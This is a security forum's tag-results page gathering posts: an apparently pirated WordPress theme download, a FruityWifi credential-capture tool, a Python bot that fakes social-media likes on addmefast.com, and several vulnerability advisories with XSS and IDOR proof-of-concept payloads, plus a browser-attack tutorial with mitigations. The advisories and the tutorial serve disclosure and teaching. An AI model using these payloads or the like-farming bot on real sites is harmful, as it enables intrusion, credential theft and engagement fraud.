Jump to content

Search the Community

Showing results for tags 'page'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Occupation


Interests


Biography


Location

  1. Filip – IOS App Store v.2.0.1200 Premium Wordpress Theme for Affiliate IOS App from Itune About IOS App Store: Flip IOS App Store Premium Wordpress theme allow you build ios app store like Google Play, Itune App Store .... It is full automatic. No need maintain. Flip IOS App Store Features: Itune Affiliate Integration IOS App Store Theme integrate affiliate application of Itune. You can use your itune affiliate id in your website. If you don’t have itune affiliate, you can signup it easy. Import Genres As Category You can import genres of itune affiliate as category to your website with one click. By this way, you will save your time when create application category for your website. Easy Features Category You can manager feature category of your website, you can choose any category as feature in category option panel. Automatic Import App Application feeds will automatic import to your website. You can choose your location, import cycle, feed type, … and how many items will import to your website. If you don’t want automatic import, you can turn it off. Target Import App You can import ios application to your website from your keyword. Just enter keyword, search and publish it. Mobile Ready Our themes support all morden device includes: iphone, ipad, android, … your visitor can use any device to visitor to your website. Custom Background You can change background of header, footer, or website background. With our themes, you change it very easy in Theme Option Panel. You can upload a images, change color, … Unlimit Sidebars With our themes. you to create an unlimited number of sidebars from the Sidebar Control Panel. It allows you to assign a custom sidebar to every single page, archive or index. And you can always use the default ones as well Compatible with all browsers. Our themes are compatible with the most popular internet browsers. It’s important that your website performs well for everyone that visits it. Themed Login & Signup Pages We don’t use default login page and register page of wordpress. Our themes have a separate login page and register page. It makes your website more friendly and easier to use. Google Analytics Google analytics or other tracking code can easy put to your website in theme option panel. Tracking Code With our themes have panel option help you add tracking code for each page, post in your website. It helps you easily manage visitors to your website. And find better marketing solution for your websites. Easy change layout By default, we are intergate best layout for your website. However, you can change layout of your website in theme option panel with one click. Search Engine Optimized With our themes, You will don’t need install plugins. SEO is include in our themes. You can easy add meta tags, keywords, … for each page. or It will auto generate for your post, page and other page. Ease change Logo, favicon You can easy upload favicon, logo. Change logo position on your website … Auto-Updates Our themes will auto check new version and update for your website. New version will notify in admin control panel or email to your email. You can choose install automatic mode or manual mode. Easy Description By default, wordpress will use top of content in your post, or page or post expert(if theme support it). But, with our themes, you can custom description fo your post, page. You can choose any content you like. Page Options Different with others themes, you can choose to hide or display the title, author, categories, tags, … of each page, post, … You can do it very easy in Post Panel. Easy Sidebar Control With our themes, you can control layout of each sidebar. You can select layout for sidebar, turn on or off it. … Unlimited Font Our themes includes support all Google fonts, you can use any font of Google Font you like. If you don’t want use google fonts. You can upload your own font to your website. It is very easy to do in Font Panel. HTML5 / CSS3 We believe modern WordPress themes should be using modern technologies. Every theme in our catalogue is based on HTML5 / CSS3 (progressively). DEMO: Top App for iPhone, IPad - IOS App Store - Top App for iPhone, IPad - IOS App Store Theme Page: Filip - IOS App Store - SuuPress.com Download: iosappstore-full.zip - Google Drive
  2. Cumpar Pagina de fb straina , ma intereseaza vechimea, nu neaparat like-uri sau numarul de urmaritori.
  3. FruityWifi is a wireless network auditing tool based in the Wifi Pineapple idea. The application can be installed in any Debian based system. Tested in Debian, Kali Linux, BugTraq, Kali Linux ARM (Raspberry Pi), Raspbian (Raspberry Pi), Pwnpi (Raspberry Pi). With the new version, it is possible to install external modules. This functionality gives the user more flexibility and the FruityWifi can be customized. The modules can be added or removed anytime using the on-line repository. A new modules panel was added to the status page. All modules can be enabled/disabled from this panel. The new phishing option allows to enable/disable the feature from the status page. Responder.py module has been released and can be installed from the modules page. (HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server can be enabled to capture user, passwords and NTLM/LM hashes) Download: https://github.com/xtr4nge/FruityWifi
  4. ....................
  5. Admin Page Finder 5.0 Download: DepositFiles
  6. Este un Admin page finder facut in python. Sursa nu este in totalitate a mea asa ca nu vreau comentarii rautacioase. M-am gandit sa il postez deoarece unora chiar le poate fi de ajutor. PS: Scuze pentru exemplul de site dar altceva nu mi-a venit in minte decat site-ul lui Viorel Download LINK : Download ADMIN PAGE FINDER By Cyb3rGhost
  7. Guest

    First page

    Salutare, as avea o propunere pentru "first page" respectiv o optiune pentru a selecta mai multe per page. Gen acum sunt 20 si sa se poate alege 30/40/50/100. Poate e irelevanta propunerea dar nah.
  8. Salut. Am instalat Premium SEO pack . si la sitempa xml imi da eroarea asta . Ma poate ajuta careva? This page contains the following errors: error on line 5 at column 51: xmlns:schemaLocation: 'http://www.sitemaps.org/schemas/sitemap/0.9 http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd' is not a valid URI Below is a rendering of the page up to the first error.
  9. AddMeFast-Bot Automating the process of liking/subscribing/viewing etc... on addmefast.com in order to get points and benefit from their service Update: now working anymore, 01-10-2015 import mechanizeimport re from time import sleep import threading #cut something in many parts def chunkIt(seq, num): avg = len(seq) / float(num) out = [] last = 0.0 while last < len(seq): out.append(seq[int(last):int(last + avg)]) last += avg return out #generates a browser def genbrowser(): br = mechanize.Browser() br.set_handle_robots(False) br.set_handle_redirect(True) br.addheaders = [('User-agent', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.6.5')] return br class AMB(threading.Thread): # define environment variable def __init__(self, rangex, user, passw): self.br1 = genbrowser() self.alogin(self.br1, user, passw) self.range = rangex threading.Thread.__init__(self) self.timeout_value = 30 # log the user in def alogin(self, br, user, passw): br.open('http://addmefast.com', \ 'email={0}&password={1}&login_button=Login'.format(user.replace('@','%40'), passw)) if 'Welcome' in br.response().read(): print "Login successful on add me fast" #main function def run(self): sleep(1) for i in self.range: try: #goes to a page with many links to like #self.br1.open( #act=getLinksList&params={"network":"1", "page":"1", "isFBpage":"1"} self.br1.open( 'http://addmefast.com/includes/ajax.php', 'act=getLinksList&params={"network":"1", "page":"%s", "isFBpage":"1"}' % (i),timeout=self.timeout_value) #gets this : title="http://www.facebook.com/Ocacadordetrolls" id="L_b89734d43ed3a3dce20eeaab183365 page_and_Lid = re.findall('div class="freepts_row" title="(.*)" id="(.*)["]{1}>', self.br1.response().read()) #confirmSubscribe(162255, "http://www.facebook.com/TOKZ.cs", "02c08e63ec34b4c0b562ed71162255", "1", 0, "UV9W49sV%2FYIQeuGBKkE7PauwNpaJf345m0G%2FDOM3SA6GKryoh8Vrk212"); number_and_token = re.findall("""getFBLikesBef\((.*)[,]{1} ".*["]{1}, ".*["]{1}, "1", 0, "(.*)["]{1}\);""", self.br1.response().read()) i = 0 while i < len(page_and_Lid): page = page_and_Lid[0] Lid = page_and_Lid[1] number = number_and_token[0] token = number_and_token[1] #http://addmefast.com/includes/ajax.php, act=checkFollowed&params={"id":"L_b89734d43ed3a3dce20eeaab183365", "url":"http://www.facebook.com/Ocacadordetrolls", "network":"1"} self.br1.open('http://addmefast.com/includes/ajax.php','act=checkFollowed&params={"id":"%s", "url":"%s", "network":"1"}' % (number, page),timeout=self.timeout_value) #http://addmefast.com/includes/ajax.php, act=updateAction&params={"link_id":"L_b89734d43ed3a3dce20eeaab183365", "url":"http://www.facebook.com/Ocacadordetrolls", "network":"1", "IXY5pZpE":"UV9W49sV%2FYIQeuGBKkE7PauwNpaJf345m0G%2FDOM3SA6GKryoh8Vrk212"} self.br1.open('http://addmefast.com/includes/ajax.php','act=updateAction&params={"link_id":"%s", "url":"%s", "network":"1", "IXY5pZpE":"%s"}' % (Lid, page, token),timeout=self.timeout_value) print "New shit made" i+=1 except Exception, e: print e if __name__=='__main__': nbthreads = input('Number of threads: ') z = chunkIt(range(1,int(open("number.txt").read())+1), nbthreads) user, passw = open('account.txt').read().split(':', 1) while 1: for i in z: try: AMB(i, user, passw).start() except: pass while threading.activeCount() > 1: sleep(1) Source
  10. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Product: phpTrafficA Product page: phpTrafficA Homepage Affected versions: Up to and including 2.3 (latest as of writing). Description: The user agent string provided by the browser is not sanitized nor escaped when handled. This string is then outputting into HTML code on the "Latest visitors > Details" page, leading to HTML injection that can be abused to perform XSS. For example, the following user agent will cause a JavaScript dialogbox to pop up as soon as the page is visited: "><script>alert();</script> This page can be hidden from the public, in which case only admins can visit it. However, the script still executes when they do, which could enable a malicious user agent to steal the phpTrafficA cookie (no expiry) or other admin credentials. Proposed fix: Escape the HTML characters with htmlspecialchars before outputting the user agent string. In: Php/stats/statsRecent.inc.php Line 304: echo "<tr class=\"data av $even $clrobots $clreturn\"><td nowrap>$end</td><td> $dur</td><td align=\"center\"> ".format_float($hits)." </td><td> <a href=\"./index.php?mode=stats&sid=$sid&show=clickstream?=$lang&ip=$ip\" title=\"".$strings['Moreinfovisitor']."\" class=\"basic\">$ipText</a> </td><td align=\"center\"> ".format_float($visits)." </td><td>".countryFlag($country)."</td><td>".osImg($os,'')."</td><td>".browserImg($wb,$agent)."</td><td>$page</td><td>$refString</td></tr>\n"; becomes: echo "<tr class=\"data av $even $clrobots $clreturn\"><td nowrap>$end</td><td> $dur</td><td align=\"center\"> ".format_float($hits)." </td><td> <a href=\"./index.php?mode=stats&sid=$sid&show=clickstream?=$lang&ip=$ip\" title=\"".$strings['Moreinfovisitor']."\" class=\"basic\">$ipText</a> </td><td align=\"center\"> ".format_float($visits)." </td><td>".countryFlag($country)."</td><td>".osImg($os,'')."</td><td>".browserImg($wb,htmlspecialchars($agent))."</td><td>$page</td><td>$refString</td></tr>\n"; Line 369: $echo = "<tr><td valign=\"top\" colspan=\"3\">$ip ($whoislink$baniplink)<br>$host<br>$labelTxt<table class=\"basic\"><tr><td>".countryNameFlag($country)."</td></tr></table></td><td valign=\"top\" colspan=\"2\">".$strings['Agent'].": $thisagent<br><table class=\"basic\"><tr><td>".osImgName($os)."</td><td>".browserImgName($wb)."</td></tr></table>".$strings['Referrer'].": "; becomes: $echo = "<tr><td valign=\"top\" colspan=\"3\">$ip ($whoislink$baniplink)<br>$host<br>$labelTxt<table class=\"basic\"><tr><td>".countryNameFlag($country)."</td></tr></table></td><td valign=\"top\" colspan=\"2\">".$strings['Agent'].": ".htmlspecialchars($thisagent)."<br><table class=\"basic\"><tr><td>".osImgName($os)."</td><td>".browserImgName($wb)."</td></tr></table>".$strings['Referrer'].": "; Best regards, Daniel Geerts -----BEGIN PGP SIGNATURE----- Version: GnuPG/MacGPG2 v2.0.22 (Darwin) Comment: GPGTools - https://gpgtools.org iQIcBAEBCgAGBQJVJPGzAAoJEHn1bVIKHk5N5egP/0FRgNCiTwYyFwmqgcNLxOQ5 yuJtnGdGFvH0axXlvm+AgVYOtmM4erduSR3hCaSx4ER7f30SZkRCUuaW8aR1/Tow bdYzLXNHcY21gXkhHt+bWH7ZkEpUWxXR6ZzrwL5QO3Ez+QkDr1HUmg8QQPUia8Qk KGY+dbkRXqVR7MYRGjAbyceOEXpxpOtxaZ9UTSmQTGW31Upu+dmqkkOTbvV20tEj N07T4UwMffCGNWloeuXg8QvIlvwe22kV3+frA2qGxdWKHVl66iJAV0pQ+bxDgoxe Y3JsYKdeIhB6T0Yt7rpEbzlgaupQ9pg279bzGVVD4Z+AuNhvDY/4K6RZsFB11DGv eY4VR8KLyNuw5N/wLBGf9ZSL9dLBGatYxi0HoQtrmFqLppo1x6nhEV6A0gRulWRa 9L04PdWKmv+2/prwW9ygT7UFIdApT1q3Uljq9QQIWmdDxGx3YxFmvMVpC5NThtxO ElN8fhQpUKFss439qiLaGEMKO/D4bNC71Ydo6jvZOWQ+9eBxmMUT7XfK6fnB811c RTRON1SG73AWcbfpIJ/dM+g0jm6bcvVVQxNmaARdlf+E2ihXnMPU2k39ndfV/vqD 7iuZQraH1ZrQJAqjVmzHWvEfEPyeaiJPRguu1kmnG8QkSMDtBHIpGvvHCHSU4ioF +wxMYqlgbfJGakc4s5RO =wCVy -----END PGP SIGNATURE----- Source: http://packetstorm.wowhacker.com/1504-exploits/phptraffica23-xss.txt
  11. Abstract Web browsers or mobile browsers are software applications that act as the intermediary applications between a user and the World Wide Web and are used to access information from the Web. Some of the popular browsers which we are using in our daily life are Google Chrome, Mozilla Firefox, Internet Explorer, Opera, Safari, etc. With their wide usage and increasing popularity, they have become one of the major targets for exploitation by hackers. A small mistake during the coding of the application may result in it being vulnerable to intrusions. This article is going to cover a few browser-based attacks, which are not browser specific and can be exploited on any browser if not closed by the application developers during writing or designing the application. The following browser-based attacks, along with the mitigation, are going to be covered in this article: Browser cache: Obtaining sensitive information from the cache stored in browsers. Back and Refresh attack: Obtaining credentials and other sensitive data by using the Back button and Refresh feature of the browser. Passwords in browser memory: Getting the password or credit card details stored in the browser’s physical memory. Autocomplete: Obtaining the credentials of a user from the stored password in the browser. Browser history: Sensitive information leaked through the URL from the browser’s history. 1. Browser Cache Every time when a website is opened, the contents of that web page are sent to the browser’s temporary cache folder of a user’s machine. If those contents on that web page need to load again, the browser opens the page from the cache instead of downloading the page again. If some web application stores and shows the sensitive information to the user (such as their address, credit card details, username), this information could also be stored for caching, and hence it is retrievable through examining the browser’s cache. In IE, these pages are stored in C:\Users\<user_name>\AppData\Local\Microsoft\Windows\Temporary Internet Files In Firefox, these pages are stored in C:\Users\<user_name>\AppData\Local\Mozilla\Firefox\Profiles\<profile-id>\Cache Or by typing the following URL in the address bar of the browser: about:cache In Chrome, these pages are stored in C:\Users\<user_name>\AppData\Local\Google\Chrome\User Data\Default\Cache Or by typing the following URL in the address bar of the browser: chrome://cache Proof of Concept This demo is shown in the Mozilla Firefox browser. Log in to the application, access a few pages and then log out of the application. In the address bar, type about:cache. This shows the cache store in the browser. Go through the list and access the cache content of the website you are interested in. The following screenshot shows the URL for the user dashboard. The user dashboard can have sensitive information like address, phone number, mapped credit card details, e-mail ID, etc. On opening a specific cache entry, the user dashboard can be seen along with the address, phone number, order history, etc. This is shown in the following screenshot Mitigation This problem can be mitigated by setting proper cache control attributes in the response header. Mainly there are two types of cache attributes: 1. Cache-control: no-cache The no-cache attribute indicates that the browser should not use the information that is cached for that particular request–response pair. The browser stores the cache, but instead of showing the content from the cache, it sends the request to the server each time. But again, the cache will be only be in the browser and can be easily accessed by an attacker or malicious user. 2. Cache-control: no-store The no-store attribute indicates that the request–response pair should not be cached and stored in the browser. This applies to the entire page. 3. Using HTML meta tags You can implement the cache control using Meta tags also. Meta tags can be set as follows: <meta http-equiv=”Cache-Control” content=”no-cache” /> <meta http-equiv=”Cache-Control” content=”no-store” /> Here, if the cache-control header is manually appended in the HTTP response and set to no-cache, as shown in the following screenshot, the browser will still cache the page. If the browser cache is accessed, the cached pages of a user’s dashboard can be found. Opening it in Offline mode will show the order details, as shown in the screenshot below. Now, if the value of a cache-control header is set to no-store, no-cache and the browser cache is accessed, the cached pages of a user’s dashboard will not be found. This is shown in the following screenshots. Hence, the developer should analyze the web page content and implement proper cache-control attributes on the pages storing sensitive data. 2. Password in browser memory Most of the applications and servers store the password in hashed or encrypted format, but such hashing/encryption is not applied while storing passwords in the browser memory. The GET and POST requests on any sensitive page where the user is supplying sensitive information (like credentials, credit card number, etc.) is stored in the browser memory while it is open. An attacker with local access to the system can read the sensitive data using memory-reading tools like WinHex. An adversary with physical access to the user’s open browser, after logout, can thus steal the sensitive data from the memory. Once sensitive data like a password is discovered, attackers can escalate their privileges in the application. Proof of Concept Access the application. Enter the valid credentials, as shown in the following screenshot, and browse through the application. After logging out of the application, do not close the browser. Open any memory reading tool like “Winhex” and navigate to the following path, as shown in the screenshots below: Tools ? Open Ram ? Choose a browser (in this case Firefox) ? Select Entire Memory Search through the data using the username. The complete login request for that specific application can be obtained, as shown in the screenshot below. From here, an attacker can steal the login credentials of a user and escalate his privilege. Mitigation As this problem is present in the browser/local machine, using SSL will not mitigate this. A user can’t stop the browser from storing the password or other sensitive information. A solution has to be implemented through which the attacker can’t replay the password value obtained from the physical memory. So, the solution for this is to implement salted hashing. Instead of sending the password to the server, send the salted hash value of the password. Here is how the salted hashing technique works: Store the MD5 hash of the password in the database. (MD5 hash is a cryptographic technique in which the actual value can never be recovered). When a client requests for a login page, the server generates a random number called salt and sends it to the user along with the page. A JavaScript present on the client machine calculates the MD5 hash of the password entered by the user. It then combines the hash value with the salt value and recalculates the hash value. This hash value is sent to the server. The server picks the hash value of the password from its database, combines it with the salt value and calculates the MD5 hash value. If both the values match (it will happen only when the user enters the correct password), the user is authenticated to the application. Every time the salt value will be different; hence, even if the attacker gets the hashed password from the browser’s memory, he can’t replay it. Another solution could be implementing a JavaScript, which forcefully closes the browser once the user is logged out of the application. This will flush the complete memory of the browser, and hence no data can be retrieved from the browser’s memory. 3. Back and Refresh attack Browsers have the ability to maintain a recent record of pages that were visited by a user. The Back and Forward buttons on browsers use this functionality to display the pages recently browsed. In addition, browsers also keep track of variables like username, password, credit card details, etc. that were POSTed to the server while fetching the page. If a user logs in to the website, performs some actions and then logs out, and an adversary has access to the same machine as the user, he can see the logout page that is displayed on the browser window. He can then click the Back button until he reaches the page shown after a successful login. Here, the attacker can click the Refresh button, and the browser automatically resubmits the request with all the information. Proof of Concept Consider the Change Password page of an application: Log in to the application and access the Change Password page. Enter the values in the Current Password and New Password fields and click Submit. The request and response series for the Change Password request are shown in the following screenshots. Request Response The following screenshot shows that the password gets changed successfully. Browse through the application and then log out of the application. After logout, leave the machine without closing the browser window. An attacker who has physical access to this machine can simply click the Back button drop-down list and identify the page which comes after the Change Password page. This is depicted in the following screenshot. When a specific page is clicked, the browser displays the warning that the page has expired, as shown in the following screenshot. At this point the attacker can start a browser proxy tool like Burp and configure the browser to send its requests through the proxy. On the error page, the adversary clicks the Refresh button. The browser shows a pop-up warning to the user about reposting some of the variables in order to access the page, as shown in the screenshot below. The attacker clicks the “Resend” button. The attacker can see the request going to server using the configured proxy tool and can steal the password value of the user. This is shown in the screenshot below. Variation of the attack Many times it has been observed that the site is using redirection on successful login but not on unsuccessful login. If a login page is secured by CAPTCHA and the user provides the correct credentials but the wrong CAPTCHA value, then the user is again served with the login page with an error message. In this case too, an attacker can steal the credentials using the Back and Refresh features. Even if CAPTCHA is not implemented, an attacker can get some sensitive information like correct username or password. Proof of Concept Access the login page of the application and provide the correct username and wrong password, as shown in the following screenshot. After validating the credentials, the server responds with a “200 OK” with error stating “Username/Password is wrong”. This is shown in the screenshots below. Click the Back button and access the page which came after providing the incorrect credentials, as shown in the following screenshot. The browser warns that the document has expired and asks the user to resend the data to the server, as shown in the following screenshot. Configure the proxy between the browser and server and intercept the data going to the server. Click the “Resend” button. The user credentials can be seen in cleartext in the captured request, as shown in the following screenshot. Cause of problem The browser keeps track of the requests sent to server to fetch particular pages. In this case, the Change Password page is “changepass.aspx” and the page which appears after is “changepass1.aspx”. The “changepass1.aspx” page is displayed after providing the Current, New and Confirm Password values. So, the browser remembers the request which is sent to get the “changepass1.aspx” page. The following steps are present for the existing scenario: The user accesses the “changepass.aspx” page. The user types the current password, new password, and confirm new password and submits the request which is sent to “changepass1.aspx”. The user is authenticated in the “changepass1.aspx” page. The user is served with the “changepass1.aspx” page. When the attacker clicks the “changepass1.aspx” page, the request which was sent to render “changepass1.aspx” is resent to the server. This request contains the current, new and confirm new password values. Mitigation The following steps will be performed if an intermediate page is implemented between “changepass.aspx” and “changepass1.aspx”: The user accesses the “ChangePass.aspx” page. The user types the current password, new password, and confirm new password and submits the request to “CheckPass.aspx” The user is authenticated in the “CheckPass.aspx” page. The user is redirected to the “ChangePass1.aspx” page. The browser sends a new request to fetch the “ChangePass1.aspx” page. Now, even if an attacker refreshes the “changepass1.aspx” page, the request which the browser used to get “changepass1.aspx” will be sent, which is a redirect request sent by “CheckPass.aspx”. The request will be a simple GET request for fetching “ChangePass1.aspx” and there will be no value going in that request. The solution should be implemented on all the pages where a form is being submitted or some sensitive action is happening. 4. Autocomplete In many applications, when the user submits credentials, the browser shows a pop-up for remembering the password. If the user clicks “Remember password”, the browser will store the password and automatically enter it when the same application is accessed again. The feature is convenient for users, as they don’t have to remember and enter the password, but it poses a problem if the user is using this feature on a shared or public computer. An attacker can easily retrieve the stored password from the browser. Even if the stored passwords are encrypted or protected by the master password (a password to access the stored passwords), an attacker can retrieve this password by visiting the application, for which the password is stored, in the browser. An attacker enters the username and the browser automatically fills the password field. An attacker can run a proxy tool like Burp to intercept the request going to server and then can obtain the cleartext or encrypted password going to server. The saved password can be accessed by navigating to: Firefox: Options ? Security ? Saved Password Chrome: Settings ? Manage password (Under password and forms) IE: Internet Options ? Content ? AutoComplete Settings ? Manage Passwords Proof of Concept Here, after entering the credentials, the browser shows a popup asking the user if the password for the website should be remembered. This is depicted in the screenshot below. If the user clicks “Remember Me”, the password will be stored in the browser. In Firefox, the saved password can be accessed by navigating to Tools ? Options ? Security ? Saved Password. This is depicted in the following screenshot. When the “Saved Passwords” button is clicked, the browser shows the list of websites for which the passwords are stored in the browser. This is shown in the following screenshot. If the “Show Passwords” button is clicked, the user will be able to see the stored passwords, as shown in the screenshot below. Now, suppose the list of stored passwords is secured by a master password in the browser. Then the user has to enter the master password to access the list, as shown in the screenshot below. In this case, an adversary needs to use an intermediate proxy tool to intercept the request going to the server. Go to the application and double click the username field. It will show the list of the stored usernames. Click one username and the browser will automatically fill the password from the stored password list. This password can’t be seen, as it is hidden behind the asterisk symbol. A user can click the Submit button and capture the request going to server using a web proxy tool like Burp. From the intercepted request, it is easy to find the password of submitted username, as the data can be seen in cleartext. This is shown in the following screenshot. Mitigation The problem can be solved by setting the Autocomplete attribute in the Login and other sensitive pages. Make sure the Autocomplete attribute for all sensitive pages is set to “off”. A sensitive page can be the Login page, change password page, edit information page, etc. If Autocomplete is not configured on the page, then by default it is “ON” and the application will store the information. This can be done using the following command: < form autocomplete=”off”> – It will set Autocomplete to “OFF” for all form fields in the page. Even if the browser is configured to store the password, the above code will overwrite the browser settings. The Autocomplete attribute is ignored in the latest versions of all browsers. Hence, the above solution won’t work for the latest versions of the browsers. As a security best practice, a user should be warned with a generic warning message about storing the cleartext password in the browser. A more advanced way of implementation, involving HTML and JavaScript, can be used. A sample code is available here. 5. Browser history When a user submits any data, it goes to the server either in a GET request or in a POST request. In a GET request the user data is present in the URL itself, whereas in a POST request the user data is present in the body of the request. The following two screenshots show user data going in GET and POST requests. All GET requests that are accessed from the browser are stored in the browser’s history and cache. This data can be viewed even if the user is logged out or the browser is closed by checking the history of the browser. So, if an application sends the user’s sensitive information through a GET request, i.e. through URL, an attacker can obtain this data by checking the browser history. GET request: POST request: Proof of Concept Here, after entering the credentials on the website when the user clicks the LOG IN button, the credentials are sent in a GET request. This is shown in the following screenshot. The request going to server is captured in Burp, which shows that the user provided data is sent as a GET request. This is depicted in the following screenshot. So, an attacker who has physical access to the user’s machine can see these credentials in the browser’s history, as shown in the screenshot below. In the same way, if an application sends other sensitive data like credit card details through the GET request, the data can be accessed from the browser history. Mitigation Never send sensitive information in the GET request. Data containing sensitive information should be sent through the POST request. When sensitive information is sent in the POST request, the data goes in the request body, and hence can’t be accessed from the browser history, because the browser history only shows all the GET requests. Implement the POST method in the form as shown below: <form name=”login” action=”index_submit” method=”POST” accept-charset=”utf-8?> The above screenshots shows that no sensitive data is being stored in the browser history when the application is using POST instead of the GET method. Conclusion So, we have now discussed some browser-based attacks in this article. These attacks are applicable on web as well as mobile browsers. To perform any of the above attacks, an attacker has to depend on the following points: The attacker should have physical access to the victim’s machine. For some attacks, the browser should not be closed. The victim should not delete the browsing history, cache, etc. Due to all these limitations, the risk rating for all the above mentioned attacks ranges from Medium to Low, but depending on the information received, it can be high too. If an attacker can get account/credit/debit card details in the browser’s cache or through the Back and Refresh attack, then the risk rating would be high. All these vulnerabilities can be avoided by implementing the proper controls discussed in this article. References https://devcenter.heroku.com/articles/increasing-application-performance-with-http-cache-headers https://www.owasp.org/index.php/Testing_for_Vulnerable_Remember_Password_(OTG-AUTHN-005) http://repo.hackerzvoice.net/depot_cehv6/CEHv6%20Module%2059%20How%20to%20Steal%20Passwords/Stealing_passwords_via_browsers.pdf Source
  12. # Affected software: phplist # Type of vulnerability: insecure object reference # URL:phplist.com # Discovered by: Provensec # Website: http://www.provensec.com #version: phpList ltd. - v3.0.10 # Proof of concept insecure object refrenced on page deltetation vuln param:delete example: http://demo.phplist.com/lists/admin/?page=send&delete=2&tk=035d99 ref: https://www.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_%28OTG-AUTHZ-004%29 Source
  13. ###################################################################### # Exploit Title: Samba.org and OpenLDAP.org Reflected XSS # Date: 02/04/2015 # Author: Yann CAM @ Synetis - ASafety # Vendor or Software Link: www.samba.org & www.openldap.org # Version: / # Category: Reflected Cross Site Scripting # Google dork: # Tested on: Samba.org and OpenLDAP.org main domains ###################################################################### Samba description : ====================================================================== Samba is a free software re-implementation of the SMB/CIFS networking protocol, and was originally developed by Andrew Tridgell. Samba provides file and print services for various Windows clients and can integrate with a Windows Server domain, either as a Domain Controller (DC) or as a domain member. As of version 4, it supports Active Directory and Windows NT domains. www.samba.org is the main domain of the project. OpenLDAP description : ====================================================================== OpenLDAP is a free, open source implementation of the Lightweight Directory Access Protocol (LDAP) developed by the OpenLDAP Project. It is released under its own BSD-style license called the OpenLDAP Public License. www.openldap.org is the main domain of the project. JitterBug project description : ====================================================================== JitterBug is a web based bug tracking system. It was originally developed by the Andrew Tridgell to handle bug tracking, problem reports and queries from Samba users. It is now available under the GNU General Public License in the hope that it will be useful for other projects. JitterBug operates by receiving bug reports via email or a web form. Authenticated users can then reply to the message, move it between different categories or add notes to it. In some ways JitterBug is like a communal web based email system. This web page is itself a JitterBug page. You can get an idea of what JitterBug can do by playing with the various links and buttons. JitterBug was used by many others open-source projects like Gnome, rsync, The Gimp, linux-patches, ProFTPD, Willows, Java Linux, WindowMaker, mod_ssl, GnuCash or OpenLdap. Only OpenLDAP and Samba use it currently, so they are both impacted by the vulnerability describes here. RXSS Vulnerability description - PoC : ====================================================================== A reflected XSS is available in the JitterBug bug tracking project provided on the samba.org and openldap.org websites. Through this vulnerability, an attacker could tamper with page rendering, redirect victims to fake Samba/OpenLDAP portals, or capture Samba's (OpenLDAP) users credentials such cookies. It's also possible to forge a fake page with this XSS to provide a backdoored version of softwares to users. This reflected XSS is on GET "id" variable and is not properly sanitized before being used to his page. Tested on Firefox 35.0. PoC: http://www.samba.org/cgi-bin/jitterbug/CVS?id=1337</TITLE><img src=x onerror="alert(/Reflected XSS - Yann CAM @asafety/)" /><TITLE>;selectid=1337 JitterBug future : ====================================================================== As indicated by Samba : The JitterBug project is no longer being actively maintained. Jitterbug has known unfixed security vulnerabilities. Unless you know exactly what you are doing, you should not use it any more. If you wish to take over as the maintainer then please contact Andrew Tridgell at [email]jitterbug@tridgell.net[/email] A possible patch is to sanitize each call of the jitterbug.c file : void print_title(char *fmt, ...) Which injects GET vars directly in HTML source generated : print_title('%s - %s/%s', lp_title(), directory, cgi_variable('id')); In the cgi.c file, there is a potential function to escape all dangerous chars : char *urlquote(char *s) Screenshots : ====================================================================== - [url]http://www.asafety.fr/data/20141126-RXSS_openldap.org_synetis_001.png[/url] - [url]http://www.asafety.fr/data/20141126-RXSS_openldap.org_synetis_002.png[/url] - [url]http://www.asafety.fr/data/20141126-RXSS_samba.org_synetis_001.png[/url] - [url]http://www.asafety.fr/data/20141126-RXSS_samba.org_synetis_002.png[/url] Solution: ====================================================================== Fixed by OpenLDAP team (no details) JitterBug is no longer maintained on Samba website. Thanks to both team, Samba and OpenLDAP, for their kindness and responsiveness. Additional resources : ====================================================================== - [url]https://www.samba.org/jitterbug/[/url] - [url]http://www.openldap.org/its/index.cgi/Web?id=7988[/url] - [url]https://bugzilla.samba.org/show_bug.cgi?id=10967[/url] - [url]http://www.asafety.fr/vuln-exploit-poc/contribution-reflected-xss-vulnerabilites-dans-samba-org-et-openldap-org[/url] - [url]http://www.synetis.com[/url] Report timeline : ====================================================================== 2014-11-26 : Samba ticket created to alert team with details and PoC. 2014-11-26 : OpenLDAP ticket created to alert team with details and PoC. 2014-11-26 : OpenLDAP fix the vulnerability. 2014-11-27 : Samba response with additional questions. 2015-03-30 : New comment to get a status 2015-03-30 : JitterBug on Samba.org website is disabled and the project is no more longer maintained. 2015-04-02 : Public advisory Credits : ====================================================================== 88888888 88 888 88 88 888 88 88 788 Z88 88 88.888888 8888888 888888 88 8888888. 888888. 88 88 888 Z88 88 88 88 88 88 88 8888888 88 88 88 88 88 88 88 88 888 888 88 88 88 88 88888888888 88 88 888888 88 88 88 8. 88 88 88 88 88 888 888 ,88 8I88 88 88 88 88 88 88 .88 .88 ?8888888888. 888 88 88 88888888 8888 88 =88888888 888. 88 88 [url]www.synetis.com[/url] 8888 Consulting firm in management and information security Yann CAM - Security Consultant @ Synetis | ASafety -- SYNETIS | ASafety CONTACT: [url]www.synetis.com[/url] | [url]www.asafety.fr[/url] Source
